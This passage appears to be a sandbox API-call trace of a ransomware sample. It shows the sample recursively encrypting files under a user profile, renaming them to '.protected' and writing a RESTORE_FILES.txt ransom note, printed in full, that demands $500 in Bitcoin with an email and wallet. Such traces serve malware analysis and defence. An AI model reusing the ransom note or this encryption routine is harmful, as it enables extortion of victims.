"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.805] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.805] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.805] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\RESTORE_FILES.txt") returned 111 [0084.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.805] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.805] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.806] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.806] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.806] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.806] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.806] CloseHandle (hObject=0x150) returned 1 [0084.806] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Windows") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Program Files") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Program Files (x86)") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="$Recycle.bin") returned 1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="System Volume Information") returned -1 [0084.806] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned 93 [0084.807] lstrcmpW (lpString1="8NES5H33", lpString2=".") returned 1 [0084.807] lstrcmpW (lpString1="8NES5H33", lpString2="..") returned 1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*") returned 95 [0084.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.807] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.807] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.807] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.807] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.807] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\.") returned 95 [0084.807] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.807] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.807] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.807] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.807] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.807] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.807] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\..") returned 96 [0084.807] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.808] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.808] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.808] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.808] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.808] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Windows") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Program Files") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Program Files (x86)") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="$Recycle.bin") returned 1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="System Volume Information") returned -1 [0084.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.808] StrStrIW (lpFirst="get.adobe[1].xml", lpSrch=".protected") returned 0x0 [0084.808] lstrcmpW (lpString1="get.adobe[1].xml", lpString2="RESTORE_FILES.txt") returned -1 [0084.808] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.808] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".txt") returned 0x0 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".rar") returned 0x0 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".zip") returned 0x0 [0084.809] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0084.810] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.810] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0084.811] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.811] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.811] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.811] CloseHandle (hObject=0x154) returned 1 [0084.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.protected") returned 120 [0084.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml.protected")) returned 1 [0084.813] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.813] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\RESTORE_FILES.txt") returned 111 [0084.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.814] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.814] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.815] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.815] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.815] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.815] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.815] CloseHandle (hObject=0x150) returned 1 [0084.815] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Windows") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Program Files") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Program Files (x86)") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="$Recycle.bin") returned 1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="System Volume Information") returned -1 [0084.815] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned 93 [0084.815] lstrcmpW (lpString1="FKLUIDU0", lpString2=".") returned 1 [0084.815] lstrcmpW (lpString1="FKLUIDU0", lpString2="..") returned 1 [0084.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*") returned 95 [0084.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\.") returned 95 [0084.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.816] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.816] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.816] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\..") returned 96 [0084.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.816] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.816] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.817] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.817] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.817] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\RESTORE_FILES.txt") returned 111 [0084.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.817] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.817] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.818] lstrlenA 